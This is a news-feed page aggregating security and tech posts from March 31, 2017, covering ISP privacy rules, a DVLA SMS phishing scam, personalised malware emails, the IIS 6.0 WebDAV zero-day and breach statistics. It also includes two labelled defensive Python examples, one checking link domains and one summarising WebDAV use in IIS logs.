Friday, March 31, 2017

Make Brick Oven-Crispy Pizza On Your Countertop

The ability to create quality margherita pizza at home negates several of the few remaining reasons to leave the house.

The Crispy Crust Pizza Maker is elementary by Breville standards, but delivers Breville-quality results just the same. The Pizza Maker is capable of a whopping 660 degrees, produced by top and bottom heating elements that surround its baking stone and replicate a traditional brick oven, yielding perfect pies up to 12" in diameter.

Controls are dead simple, with only an on/off knob and thickness dial to tweak, while a critical window on the top of the unit lets you check doneness. The whole process is pretty hard to screw up, and also delicious.


from Lifehacker http://ift.tt/2mVExsc

Friday Squid Blogging: 1887 Animal-Combat Print with Giant Squid

Great Victorian animal-combat scene featuring a giant squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.


from Schneier on Security http://ift.tt/2oj7Xog

Finding FBI Director James Comey's Twitter Account

An interesting story of uncovering an anonymous Internet social media account.


from Schneier on Security http://ift.tt/2oiEQ4c

Congress Removes FCC Privacy Protections on Your Internet Usage

Think about all of the websites you visit every day. Now imagine if the likes of Time Warner, AT&T, and Verizon collected all of your browsing history and sold it on to the highest bidder. That's what will probably happen if Congress has its way.

This week, lawmakers voted to allow Internet service providers to violate your privacy for their own profit. Not only have they voted to repeal a rule that protects your privacy, they are also trying to make it illegal for the Federal Communications Commission to enact other rules to protect your privacy online.

That this is not provoking greater outcry illustrates how much we've ceded any willingness to shape our technological future to for-profit companies and are allowing them to do it for us.

There are a lot of reasons to be worried about this. Because your Internet service provider controls your connection to the Internet, it is in a position to see everything you do on the Internet. Unlike a search engine or social networking platform or news site, you can't easily switch to a competitor. And there's not a lot of competition in the market, either. If you have a choice between two high-speed providers in the US, consider yourself lucky.

What can telecom companies do with this newly granted power to spy on everything you're doing? Of course they can sell your data to marketers -- and the inevitable criminals and foreign governments who also line up to buy it. But they can do more creepy things as well.

They can snoop through your traffic and insert their own ads. They can deploy systems that remove encryption so they can better eavesdrop. They can redirect your searches to other sites. They can install surveillance software on your computers and phones. None of these are hypothetical.

They're all things Internet service providers have done before, and they are some of the reasons the FCC tried to protect your privacy in the first place. And now they'll be able to do all of these things in secret, without your knowledge or consent. And, of course, governments worldwide will have access to these powers. And all of that data will be at risk of hacking, either by criminals or by other governments.

Telecom companies have argued that other Internet players already have these creepy powers -- although they didn't use the word "creepy" -- so why should they not have them as well? It's a valid point.

Surveillance is already the business model of the Internet, and literally hundreds of companies spy on your Internet activity against your interests and for their own profit.

Your e-mail provider already knows everything you write to your family, friends, and colleagues. Google already knows our hopes, fears, and interests, because that's what we search for.

Your cellular provider already tracks your physical location at all times: it knows where you live, where you work, when you go to sleep at night, when you wake up in the morning, and -- because everyone has a smartphone -- who you spend time with and who you sleep with.

And some of the things these companies do with that power are no less creepy. Facebook has run experiments in manipulating your mood by changing what you see on your news feed. Uber used its ride data to identify one-night stands. Even Sony once installed spyware on customers' computers to try and detect if they copied music files.

Aside from spying for profit, companies can spy for other purposes. Uber has already considered using data it collects to intimidate a journalist. Imagine what an Internet service provider can do with the data it collects: against politicians, against the media, against rivals.

Of course the telecom companies want a piece of the surveillance capitalism pie. Despite dwindling revenues, increasing use of ad blockers, and increases in clickfraud, violating our privacy is still a profitable business -- especially if it's done in secret.

The bigger question is: why do we allow for-profit corporations to create our technological future in ways that are optimized for their profits and anathema to our own interests?

When markets work well, different companies compete on price and features, and society collectively rewards better products by purchasing them. This mechanism fails if there is no competition, or if rival companies choose not to compete on a particular feature. It fails when customers are unable to switch to competitors. And it fails when what companies do remains secret.

Unlike service providers like Google and Facebook, telecom companies are infrastructure that requires government involvement and regulation. The practical impossibility of consumers learning the extent of surveillance by their Internet service providers, combined with the difficulty of switching them, means that the decision about whether to be spied on should be with the consumer and not a telecom giant. That this new bill reverses that is both wrong and harmful.

Today, technology is changing the fabric of our society faster than at any other time in history. We have big questions that we need to tackle: not just privacy, but questions of freedom, fairness, and liberty. Algorithms are making decisions about policing and healthcare. Driverless vehicles are making decisions about traffic and safety. Warfare is increasingly being fought remotely and autonomously. Censorship is on the rise globally. Propaganda is being promulgated more efficiently than ever. These problems won't go away. If anything, the Internet of things and the computerization of every aspect of our lives will make it worse.

In today's political climate, it seems impossible that Congress would legislate these things to our benefit. Right now, regulatory agencies such as the FTC and FCC are our best hope to protect our privacy and security against rampant corporate power. That Congress has decided to reduce that power leaves us at enormous risk.

It's too late to do anything about this bill -- Trump will certainly sign it -- but we need to be alert to future bills that reduce our privacy and security.

This post previously appeared on the Guardian.

EDITED TO ADD: Former FCC Commissioner Tom Wheeler wrote a good op-ed on the subject. And here's an essay laying out what this all means to the average Internet user.


from Schneier on Security http://ift.tt/2ojHGqq

Text message scam from the Motor Registry – how not to get stung

As far as the crooks are concerned, yesterday’s “scam that knows where you live” attack was just not enough for people in the UK.

Today, they’re taking the name of the UK’s Motor Registry in vain.

Known colloquially as the DVLA (pronounced deevee-ellay), short for Driver and Vehicle Licensing Agency, it’s based in Swansea in Wales.

The city of Swansea, in turn, is metaphorically associated with things like speeding fines, penalty points, licence renewals… and, from time to time, refunds for overpaid vehicle tax.

Interestingly, the UK no longer issues tax discs to display on a car’s windscreen – there’s so much automated surveillance these days using Automatic Number Plate Recognition (ANPR) cameras that there’s little purpose in having a window sticker to “prove” you’ve paid.

Anyway, if you sell or scrap a car, any tax you paid in advance for the current year will be refunded automatically, so many people will be familiar with getting money back from Swansea.

Some people may very well have had trouble getting their refund, for example if there was a problem with the bank account from which they originally paid in the money, or if they aren’t at the address on record at the DVLA, causing the refund cheque to be returned undelivered.

So an SMS looking like this could easily pass muster:

But look carefully, and you’ll realise that even though the URL contains the sort of components you’d expect in the real thing, notably gov DOT uk, the end of the server name is actually a domain based in Palau (.PW).

Palau is a tiny Pacific island country of just 20,000 people that uses its short-and-sweet domain names as a source of global revenue. (PW is branded as standing for “Professional Web”, although this particular domain name is anything but.)

If you click through, you’ll see a web page that seems realistic enough at first sight, although the “facts” are bogus (you don’t get offered a refund and then claim it), and both the grammar and style are sub-standard for Her Majesty’s Government:

If you click [Get Started->], you’re straight into a phishing page that believably asks for sufficiently many personal details that the crooks could fleece you right away if you were to fill them in:

What to do?

  • Don’t rely on links to websites sent in emails, SMSs or other forms of electronic message.

Find the official website yourself – for the DVLA, for instance, look it up on an official document you’ve received in the past – and go there of your own accord. (Here’s a free hint for the DVLA: it wouldn’t do any harm to print the DVLA’s official URL somewhere on every UK driving licence, making an excellent and official way to find it.)

  • If you’re offered a financial refund, check the official website to find out how refunds really work.

For example, the DVLA issues refunds automatically in one of just two ways: by reversing a Direct Debit, if you have one set up; or by mailing a cheque to the address you have on record.

  • Don’t be misled by domain names because they start with the text you expect – it’s the right-hand end that counts.

For example, Sophos owns sophos.com, which means we can use any and all subdomain names that end with that text string, such as partners.sophos.com, nakedsecurity.sophos.com, and so on. Many browsers deliberately highlight the text at the right-hand end, to remind you to look there first.

  • If you’re asked for personal data like your address and credit card number on an unencrypted web page, don’t enter it.

Crooks can easily get certificates for HTTPS these days, so just the presence of a padlock in the address bar doesn’t confirm you are at the right site. But the absence of a padlock on a page that wants a credit card is always wrong, even if it’s the right site. (Why trust a company that clearly doesn’t take even the most basic precautions with your personal data?)

  • Report scams and dodgy SMSs like this to your mobile operator.

Having real reports and genuine complaints “from the wild” makes it possible for the regulator to take action against scammers who might otherwise get away with it. Some scams are on the grey edge of legality, and it’s community consensus that helps the regulators redefine the boundaries of acceptable text messaging behaviour.
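The advice above about domain names (it is the right-hand end that counts, and sophos.com owns every name ending in that string) can be turned into a mechanical check. The following Python is an added example and not code from Sophos or the article: it extracts the host from a link, works out which part of it somebody actually registered, and tests whether the host really sits under the official domain. The public-suffix table is a small hand-made subset (an assumption for this example; real code should load the full Public Suffix List), and the `.pw` link is a constructed placeholder shaped like the scam, not the real scam domain.

```python
"""Which organisation does a link really point at?

Added example for the Naked Security advice; not code from Sophos.
The registrable domain is the public suffix plus the one label to its
left; anything further left (or in the path) is chosen by that owner.
"""
from urllib.parse import urlsplit

# Constructed subset of public suffixes, enough for the cases below.
# Production code should use the full Public Suffix List instead.
PUBLIC_SUFFIXES = {"com", "uk", "co.uk", "gov.uk", "pw"}


def host_of(url: str) -> str:
    """Lower-cased host name of url, without any trailing dot."""
    host = urlsplit(url).hostname
    if not host:
        raise ValueError(f"no host name in {url!r}")
    return host.lower().rstrip(".")


def registrable_domain(url: str) -> str:
    """Return the part of the host that somebody actually registered.

    Walk the labels from the right-hand end, keep the longest match in
    PUBLIC_SUFFIXES, and return that suffix plus one more label.
    """
    labels = host_of(url).split(".")
    suffix_len = 0
    for n in range(1, len(labels)):  # leave at least one label for the owner
        if ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            suffix_len = n
    if suffix_len == 0:
        raise ValueError(f"unknown public suffix in {labels!r}")
    return ".".join(labels[-(suffix_len + 1):])


def belongs_to(url: str, official_domain: str) -> bool:
    """True if url's host is official_domain itself or a subdomain of it.

    A host such as dvla.gov.uk.refund-example.pw fails this check even
    though it contains the expected text, because that text is not at
    the right-hand end; so does a link that hides gov.uk in the path.
    """
    host = host_of(url)
    official = official_domain.lower().rstrip(".")
    return host == official or host.endswith("." + official)


def explain(url: str, official_domain: str) -> str:
    """One-line verdict for a link, phrased as a user could be shown it."""
    owner = registrable_domain(url)
    if belongs_to(url, official_domain):
        return f"{url}: host ends in {official_domain}, controlled by {owner}"
    return f"{url}: NOT under {official_domain}; really controlled by {owner}"


if __name__ == "__main__":
    # Constructed samples: two Sophos hosts named in the article, one
    # placeholder link shaped like the scam, and one with gov.uk in the path.
    for link, expected in (
        ("https://partners.sophos.com/", "sophos.com"),
        ("https://nakedsecurity.sophos.com/", "sophos.com"),
        ("http://dvla.gov.uk.refund-example.pw/claim", "gov.uk"),
        ("http://refund-example.pw/gov.uk/dvla", "gov.uk"),
    ):
        print(explain(link, expected))
```

The two-step design matters: `registrable_domain` answers "who owns this host?", which is what a browser highlights, while `belongs_to` answers the narrower question the user actually has, "is this the site I looked up myself?". Both reject the scam shape for the same reason: the familiar text is to the left of the real owner's suffix.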

Our parting shots

  • When faced with a web link: think before you click.
  • When faced with a web form: if in doubt, don’t give it out.



from Naked Security http://ift.tt/2ohUuNA

Review: Data Breach Preparation and Response


About the author

Kevvie Fowler is a Partner and National Cyber Response Leader for KPMG Canada and has over 19 years of IT security and forensics experience. He is a SANS lethal forensicator and sits on the SANS Advisory Board where he guides the direction of emerging security and forensics research.

Inside Data Breach Preparation and Response

Despite the fact that only one author is named on the book’s cover, this is a book that’s been compiled with the help of five other experts in several fields: crisis and risk management, technology law, cyber threat analysis and forensics, and cyber insurance.

The book starts with a chapter defining what is a data breach, the data breach lifecycle, and the most typical sources of data breaches. Readers will get a short overview of what kind of data attackers are after, what they do with it, and where they sell it. Finally, it includes an overview of the various costs that are usually associated with a data breach, helpful tips on how to minimize them, as well as a list of the most common challenges encountered when managing a breach.

The next two chapters deal with preparing for and then actually developing a Computer Security Incident Response (CSIR) Plan. They give insight into things like how to gain executive support, build a CSIR team, identify critical assets and breach scenarios, evaluate the extent of the need for cyber insurance, but also how to develop the company’s data breach response policy, and how to develop and test the CSIR plan (testing it is crucial, as it leads to improvement and keeps the plan in step with the evolution of the organization, the technology, and cyber criminals’ attack techniques and tactics). Here the readers will see why the preparation for the plan is more time-consuming than the actual formulation of the plan, and will discover all the big and small details the CSIR plan must cover.

Then comes the breach investigation – how to start it, how to choose which third parties to involve (and how to manage them), how to determine the scope of the breach – and breach containment (including how to remove sensitive information leaked online).

Communication before, during and after a breach gets a whole chapter, and rightly so – preparation is critical, and here you’ll get an insight into how to do it right, and ultimately how to tailor the message for each party involved. Next, the authors address the issue of restoring business services after a breach, and restoring trust inside the company and, at the very end, how to prepare for breach litigation, with recommendations on how to avoid it altogether.

IT security specialists have already internalized and made peace with the fact that data breaches are almost inevitable, and this book will, I believe, be a welcome addition to their shelf.

The topic is covered beautifully and thoroughly, and approached from many different angles. Despite that, the language and explanations are easy to grasp for everyone, and not just infosec pros. There are several chunks of this book that business managers and executives should definitely read, to make their choices more informed.

Rare are the authors that know how to explain complex topics in a simple manner and know how to avoid boring the reader, but these authors belong to that category.


from Help Net Security http://ift.tt/2nRd4LO

People are still the biggest security threat to any organization

Despite an increase in spending and investment in deterrence tactics and detection tools, insider threats continue to cause harm to all types of organizations.


A new report suggests that, although funding is increasing, inadequate resources are being allotted to predictive risk analytics — a critical component of mitigating insider threats. This lack of analytics investment comes at a price, as insider attacks continue to be costly.

“Ask any cybersecurity specialist to name the biggest security threat to an organization and they’ll tell you it’s people,” said Haystax CEO Bryan Ware. Yet despite increased funding on insider threat programs, he added, the problem shows no signs of abating. “Training programs and network controls are important, but without analytics that produce actionable intelligence, organizations are often left in the dark until after a malicious insider does damage.”

Using crowd-based research in partnership with the 300,000-plus members of the Information Security Community on LinkedIn, the report found nearly three-quarters (74 percent) of organizations feel vulnerable to insider threats, a significant seven-percent increase over last year.

Of the organizations that are investing in insider threat mitigation, 61 percent are focusing mostly on deterrence (e.g., access controls, encryption, policies, etc.) and 49 percent on detection (e.g., monitoring, intrusion detection systems, etc.) — while 35 percent employ forensics and analysis systems like security information and event management (SIEM) tools.


Most survey respondents (67 percent) indicate that because insiders already have credentialed access to their networks and services, they are much more difficult to detect and deter than external threats. But only 42 percent of organizations say they are regularly monitoring user behavior while 21 percent do none at all.

Insider threat detection has improved, with 46 percent of respondents believing they could detect an attack within a day at most. What’s more, 68 percent are confident in their ability to recover from an attack in a week or less, up 20 percent over last year’s survey. However, three-fourths estimate remediation costs could be up to $500,000, with the other 25 percent believing costs could exceed that amount — and perhaps reach into the millions of dollars.


from Help Net Security http://ift.tt/2nG7bAH

New infosec products of the week​: March 31, 2017

Waterfall Security, CNA Hardy and THB partner to create global industrial cyber proposition

THB, CNA Hardy and leading cybersecurity specialist Waterfall Security Solutions have entered into a partnership to provide a new cyber security protection package for industrial businesses globally.


“This new cyber insurance partnership is a global precedent on many levels. First, it documents enough concern around increasing cyberattacks on industrial facilities, a clear sign for potential high profits from financial institutions. Secondly, it demonstrates the highest level of trust possible from two Lloyd’s of London companies, CNA/Hardy and THB, in our Unidirectional Gateway technology. That is a huge statement for Waterfall, and for the certainty of using Unidirectional Gateways as the best defense to prevent cyberattacks from entering industrial control systems,” Lior Frenkel, CEO at Waterfall Security told Help Net Security.

ViaSat delivers NSA-certified Type 1 100 Gbps ethernet encryptor

ViaSat announced the ViaSat KG-142, a 100 Gbps Type 1 Ethernet encryptor, is now NSA-certified. Building on ViaSat’s IP encryption heritage, the ViaSat KG-142 delivers the encryption power of 10 separate 10 Gbps encryptors in a single 1U rack unit, increasing scalability, and minimizing network overhead for Layer 2 Ethernet communications up to TS/SCI (Top Secret / Sensitive Compartmented Information).


Qualys delivers continuous security and compliance to Google Cloud Platform customers

Qualys has extended its single-pane view of security and compliance posture into Google Cloud Platform (GCP). Users can now scan their GCP workloads, along with all other global elastic-cloud and on-premise assets, from within the Qualys Cloud Platform. Qualys Virtual Scanner Appliance (QVSA) can now be directly deployed from the Google Cloud Launcher to GCP. With a single click, GCP users can create QVSA instances for Google Compute Engine (GCE) across all GCP regions. They can also embed Qualys Cloud Agents into their GCE images for a continuous view of security and compliance state.


ClearSky Data expands backup, disaster recovery capabilities

ClearSky Data has expanded its data protection capabilities to deliver complete offsite backup and disaster recovery (DR) as part of its fully managed service. With ClearSky Data, customers only pay for a single, fully protected copy of their data that is accessible anywhere – on-premises or in the cloud. Organizations can now eliminate secondary infrastructure for business continuity and DR, including backup licenses and management, making hybrid cloud backup and DR a reality.


ManageEngine adds two-factor authentication to ADManager Plus

ManageEngine announced the addition of two-factor authentication (2FA) support in ADManager Plus, its Active Directory (AD) management and reporting solution. The company also announced the addition of user provisioning in the ADManager Plus iOS app. The addition of 2FA support establishes an extra layer of security around ADManager Plus logins while user provisioning support makes the iOS app a complete user life cycle management tool for on-the-go AD admins.


Core Security expands CoreLabs’ research

Core Security expanded CoreLabs, now a research team whose coverage holistically analyzes security attacks across attack vectors, exploits and vulnerabilities, device and identity configurations, and network traffic. The team now includes over 34 researchers around the world.



from Help Net Security http://ift.tt/2ofLk3V

Worldwide spending on security technology to reach $81.7 billion in 2017

A new update to the Worldwide Semiannual Security Spending Guide from IDC forecasts worldwide revenues for security-related hardware, software, and services will reach $81.7 billion in 2017, an increase of 8.2% over 2016.


Global spending on security solutions is expected to accelerate slightly over the next several years, achieving a compound annual growth rate (CAGR) of 8.7% through 2020 when revenues will be nearly $105 billion.

“The rapid growth of digital transformation is putting pressures on companies across all industries to proactively invest in security to protect themselves against known and unknown threats,” said Eileen Smith, program director, Customer Insights and Analysis. “On a global basis, the banking, discrete manufacturing, and federal/central government industries will spend the most on security hardware, software, and services throughout the 2015-2020 forecast. Combined, these three industries will deliver more than 30% of the worldwide total in 2017.”

In addition to the banking, discrete manufacturing, and federal/central government industries, three other industries (process manufacturing, professional services, and telecommunications) will each spend more than $5 billion on security products this year. These will remain the six largest industries for security-related spending throughout the forecast period, while a robust CAGR of 11.2% will enable telecommunications to move into the number 5 position in 2018. Following telecommunications, the industries with the next fastest five-year CAGRs are state/local government (10.2%), healthcare (9.8%), utilities (9.7%), and banking (9.5%).

Services will be the largest area of security-related spending throughout the forecast, led by three of the five largest technology categories: managed security services, integration services, and consulting services. Together, companies will spend nearly $31.2 billion, more than 38% of the worldwide total, on these three categories in 2017. Network security (hardware and software combined) will be the largest category of security-related spending in 2017 at $15.2 billion, while endpoint security software will be the third largest category at $10.2 billion.

The technology categories that will see the fastest spending growth over the 2015-2020 forecast period are:

  • Device vulnerability assessment software (16.0% CAGR)
  • Software vulnerability assessment (14.5% CAGR)
  • Managed security services (12.2% CAGR)
  • User behavioral analytics (12.2% CAGR)
  • UTM hardware (11.9% CAGR).

From a geographic perspective, the United States will be the largest market for security products throughout the forecast. In 2017, the U.S. is forecast to see $36.9 billion in security-related investments. Western Europe will be the second largest market with spending of nearly $19.2 billion this year, followed by the Asia/Pacific (excluding Japan) region. Asia/Pacific (excluding Japan) will be the fastest growing region with a CAGR of 18.5% over the 2015-2020 forecast period, followed by the Middle East & Africa (MEA)(9.2% CAGR) and Western Europe (8.0% CAGR).

“European organizations show a strong focus on security matters with data, cloud, and mobile security being the top three security concerns. In this context, GDPR will drive up compliance-related projects significantly in 2017 and 2018, until organizations have found a cost-efficient and scalable way of dealing with data,” said Angela Vacca, senior research manager, Customer Insights and Analysis. “In particular, Western European utilities, professional services, and healthcare institutions will increase their security spending the most while the banking industry remains the largest market.”

From a company size perspective, large and very large businesses (those with more than 500 employees) will be responsible for roughly two thirds of all security-related spending throughout the forecast. IDC also expects very large businesses (more than 1,000 employees) to pass the $50 billion spending level in 2019. Small and medium businesses (SMBs) will also be a significant contributor to security-related spending, with the remaining one third of worldwide revenues coming from companies with fewer than 500 employees.


from Help Net Security http://ift.tt/2nlH8uT

Save Nearly $30 On the GORUCK GR1, Our Readers' Newly Minted Favorite Backpack [Exclusive]

GORUCK’s military-inspired GR1 dominated this week’s Co-Op for the best everyday backpack, and they’re celebrating by offering our readers a rare 10% discount with promo code KINJAGORUCK10.

Now, even with the code, this is still a $267 backpack. I’m not blind to the fact that that’s a lot of money. But every GR1 is hand-built over the course of four hours in the USA, is covered by a lifetime warranty, and by basically all accounts is just incredibly well-made. There’s a very real chance that this will be the last backpack you ever have to buy.

Own one? Let us know what you think in the comments.



from Lifehacker http://ift.tt/2nkLYIO

UK residents hit with extremely personalized scam emails

A compelling and potentially very successful email spam campaign is being leveraged against UK residents, warns Sophos researcher Paul Ducklin.


The email addresses the recipients by their first name, the name of the attached file is their last name, and the email body contains their exact address.

Add to this the claim that the sender has received a significant amount of personal information about the recipient and that this info was likely stolen in a hack, and one can see why many could be persuaded to download the attached file.

In this particular case, the grammar and spelling mistakes in the email body do not play a factor, as it’s possible that a well-meaning sender of such a warning is not a native English speaker.

If the recipient downloads and opens the attached Word file, he or she will be prompted to enter the password provided in the email, and to enable macros in order to view the document’s contents.

Unfortunately, this action allows the file to run a malicious macro program bundled in the file, and it will download what seems to be a GIF file. It is not: it contains an executable file – a Trojan that turns the victim’s computer into a bot, and ropes it into a botnet.

As Ducklin noted, the malware included in the file can be easily changed, or the current bot can download additional malware if so instructed by the attackers.

Needless to say, users would do well to ignore these emails. Some could (understandably) be worried about the fact that someone out there has much personal info about them, but if they are, it’s best to involve local law enforcement and ask for advice.

Still, pinpointing from where the scammers got the personal info used in the campaign is practically impossible.

“At least in the UK, many companies that collect addresses put them through some kind of standardisation algorithm to produce address data in the format preferred by the Post Office, so it can be hard to figure out the likely source of the breach,” the researcher pointed out.


from Help Net Security http://ift.tt/2nlSgsz

(IN)SECURE Magazine issue 53 released

(IN)SECURE Magazine is a free digital security publication discussing some of the hottest information security topics. Issue 53 has been released today.


Table of contents

  • How to leverage the benefits of open source software in a secure way
  • Antivirus 2017: Security with a hint of surveillance
  • Evolving PKI for the Internet of Things
  • 7 real-world steps to security nirvana
  • The HTTPS interception dilemma: Pros and cons
  • Deception security doesn’t have to be onerous or expensive
  • Report: BSides Ljubljana 0x7E1
  • 5 spring cleaning tips for your Identity and Access Management program


from Help Net Security http://ift.tt/2nyfLj8

Actively exploited zero-day in IIS 6.0 affects 60,000+ servers

Microsoft Internet Information Services (IIS) 6.0 sports a zero-day vulnerability (CVE-2017-7269) that was exploited in the wild last summer and is likely also being exploited by threat actors at this very moment.

It is a buffer overflow flaw in a function in the WebDAV service in IIS 6.0 in Microsoft Windows Server 2003 R2, and can be triggered by attackers sending an overlong IF header in a PROPFIND request.


Unfortunately, the flaw won’t be patched by Microsoft, because they stopped supporting Windows Server 2003 a few years ago (IIS 6.0 was included in the OS).

Shodan shows that there are a little over 600,000 publicly accessible IIS 6.0 servers on the Internet, and most of them are probably running on Windows Server 2003. Of these, a good 10 percent have WebDAV enabled to allow for remote web authoring, meaning that there are possibly millions of websites out there exposed to this exploit.

So what can be done about CVE-2017-7269?

The risk of exploitation can be mitigated by disabling the WebDAV service on the vulnerable IIS 6.0 installation, but not all administrators will want to do it.

Mitja Kolsek, CEO of Acros Security and co-founder at 0patch, offers another solution: a micropatch that should plug the hole.

The patch is free, and its source code open for inspection (you can view it here). For it to be delivered to the vulnerable machine admins will need to download and install a copy of the company’s 0patch Agent.

More technical details about the flaw can be found in this post by Trend Micro researchers, but the most important things to know right now are as follows:

  • The flaw can be exploited remotely, and allows attackers to execute arbitrary code on a vulnerable machine
  • A proof-of-concept exploit has been published on GitHub, so it’s highly likely that it is being repurposed by attackers and will be used soon (if it’s not already)
  • The flaw affects 32-bit and 64-bit Windows Server 2003 with WebDAV functionality enabled. It doesn’t affect newer versions of IIS (7.0 or later) and newer versions of Windows Server.
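Before disabling WebDAV as the article suggests, an administrator usually wants to know whether anyone legitimately uses it on the server, and which addresses are sending WebDAV methods at all. The Python below is an added example, not code from the article, 0patch or Trend Micro: it parses IIS W3C extended logs using the log's own `#Fields:` directive and summarises WebDAV method use per client address. The log lines are constructed for the example, and the field list in them is an assumption about how the server is configured; because parsing is driven by `#Fields:`, any field selection works as long as `cs-method` and `c-ip` are logged.

```python
"""Summarise WebDAV usage from IIS W3C extended logs.

Added example; not code from the article, 0patch or Trend Micro.
Parsing is driven by the '#Fields:' directive in the log itself, so the
only assumption is that cs-method and c-ip are among the logged fields.
"""
from collections import Counter, defaultdict

# Methods that only make sense when WebDAV is enabled on the site.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}

# Constructed sample log: the field list, addresses and requests are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2017-03-31 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2017-03-31 09:15:01 10.0.0.5 GET /index.html - 80 - 10.0.0.20 Mozilla/5.0 200 0 0
2017-03-31 09:15:07 10.0.0.5 PROPFIND /webdav/ - 80 alice 10.0.0.20 Microsoft-WebDAV-MiniRedir/6.1 207 0 0
2017-03-31 09:16:30 10.0.0.5 PROPFIND / - 80 - 203.0.113.9 - 500 0 0
2017-03-31 09:16:31 10.0.0.5 PROPFIND / - 80 - 203.0.113.9 - 500 0 0
2017-03-31 09:17:02 10.0.0.5 GET /about.html - 80 - 198.51.100.4 Mozilla/5.0 200 0 0
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            # Directive lines; #Fields may repeat when the log is rotated.
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("request line before any #Fields directive")
        values = line.split()  # IIS encodes spaces inside a field as '+'
        if len(values) != len(fields):
            continue  # skip a malformed line rather than mis-assign columns
        yield dict(zip(fields, values))


def webdav_summary(text):
    """Return {client_ip: {method: count}} for requests that used a WebDAV method."""
    summary = defaultdict(Counter)
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        if method in WEBDAV_METHODS:
            summary[rec["c-ip"]][method] += 1
    return {ip: dict(counts) for ip, counts in summary.items()}


def unexpected_webdav_clients(text, known_clients):
    """Addresses that sent WebDAV methods but are not on the known_clients allow-list."""
    return sorted(ip for ip in webdav_summary(text) if ip not in known_clients)


if __name__ == "__main__":
    print("WebDAV use by client:", webdav_summary(SAMPLE_LOG))
    print("unexpected WebDAV clients:",
          unexpected_webdav_clients(SAMPLE_LOG, {"10.0.0.20"}))
```

If the summary shows WebDAV methods only from the authoring hosts you expect, disabling the service costs nothing; if it shows none at all, the decision is easy. Either way the allow-list comparison gives a starting point for investigating addresses that should not be talking WebDAV to the server.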


from Help Net Security http://ift.tt/2niSvE1

Number of compromised records up 566% in 2016

The number of records compromised grew a historic 566 percent in 2016 from 600 million to more than 4 billion.

These leaked records include data cybercriminals have traditionally targeted, like credit cards, passwords and personal health information, but IBM X-Force also noted a shift in cybercriminal strategies. In 2016, a number of significant breaches also compromised unstructured data such as email archives, business documents, intellectual property and source code.


The IBM X-Force Threat Intelligence Index comprises observations from more than 8,000 monitored security clients in 100 countries and data derived from non-customer assets such as spam sensors and honeynets in 2016. IBM X-Force runs network traps around the world and monitors more than eight million spam and phishing attacks daily while analyzing more than 37 billion web pages and images.

“Cybercriminals continued to innovate in 2016 as we saw techniques like ransomware move from a nuisance to an epidemic,” said Caleb Barlow, VP of Threat Intelligence, IBM Security. “While the volume of records compromised last year reached historic highs, we see this shift to unstructured data as a seminal moment. The value of structured data to cybercriminals is beginning to wane as the supply outstrips the demand. Unstructured data is big-game hunting for hackers and we expect to see them monetize it this year in new ways.”

Spam surges on back of ransomware

In a separate study last year, IBM Security found 70 percent of businesses impacted by ransomware paid over $10,000 to regain access to business data and systems. In the first three months of 2016, the FBI estimated cybercriminals were paid a reported $209 million via ransomware. This would put criminals on pace to make nearly $1 billion from their use of the malware just last year.

The promise of profits and businesses' increasing willingness to pay empowered cybercriminals to double down on ransomware in 2016. The primary delivery method for ransomware is malicious attachments in spam emails. This fueled a 400 percent increase in spam year over year, with roughly 44 percent of spam containing malicious attachments. Ransomware made up 85% of those malicious attachments in 2016.

Shift from healthcare back to financial services

In 2015, Healthcare was the most attacked industry, with Financial Services falling to third; in 2016, however, attackers refocused on Financial Services. While Financial Services was targeted the most by cyber-attacks last year, data from the X-Force report shows it was only third in compromised records. The lower success rate versus the high volume of attacks in Financial Services indicates that continued investment in sustained security practices likely helped protect financial institutions.

The healthcare industry continued to be beleaguered by a high number of incidents, although attackers focused on smaller targets, resulting in a lower number of leaked records. In 2016, only 12 million records were compromised in healthcare – keeping it out of the top 5 most-breached industries. For perspective, nearly 100 million healthcare records were compromised in 2015, so 2016 represents an 88 percent drop.


Information and communication services companies and government experienced the highest number of incidents and records breached in 2016.

  • Information and Communications (3.4 billion records leaked and 85 breaches/incidents)
  • Government (398 million records leaked and 39 breaches/incidents).

Good news for defensive strategies

The average IBM monitored security client organization experienced more than 54 million security events in 2016—only three percent more events than 2015. This was marked by a 12 percent decrease year-over-year in attacks. As security systems are further tuned and new innovations like cognitive systems grow, the number of incidents overall dropped 48 percent in 2016.


from Help Net Security http://ift.tt/2nxZNFx

How CIOs are shaping the future of work

IT leaders are poised to make radical changes in the workplace, but boardrooms are holding back progress by continuing to place too much emphasis on reducing costs and keeping the lights on, according to Fuze.


The global research reveals that 93 percent of IT leaders believe digital transformation should be a critical part of their roles and 47 percent want board-level executives to measure the IT function on its ability to innovate for the business. Yet today, 44 percent of IT leaders are measured on cost cutting, with the average IT department expected to reduce expenditure by 12 percent over the next five years.

IT teams are currently spending 83 percent of their time managing IT platforms and resolving user issues, and only 11 percent of their time planning future innovations. However, the majority of IT leaders see numerous opportunities to unleash their teams from the constraints of day-to-day operations. Eighty percent of IT leaders surveyed have named a cloud champion and 67 percent are actively looking to reduce application sprawl and time spent managing redundant technologies.

Looking ahead to 2020 and beyond, IT leaders see the imminent arrival of the app generation – those teenagers who have never known a world without smartphones and instant internet – as a positive driver for change as they enter the workplace. Three-quarters of IT leaders say younger generations will drive workplace innovation and today’s workforce agrees: 82 percent of workers say young people will help refresh approaches to technology.

Trends uncovered in the report include:

The rise of super-connected, yet super-mobile workforces

Eighty-three percent of workers believe they don’t need to be in an office to be productive and 43 percent of workers believe they would be more productive working from home than in the office. Employees will value flexible work as a necessity and expectation, rather than an option.


Consumer-like experiences in the workplace

Around half (48 percent) of today’s workers say their employer does not provide adequate technology and 75 percent of the app generation want to use the latest technology at work. Fifty-nine percent of IT leaders say that adopting new technologies is a priority. IT leaders will be expected to provide technologies with great user experiences, requiring cloud-based technologies that fit with the way employees want to work, interact, and collaborate.

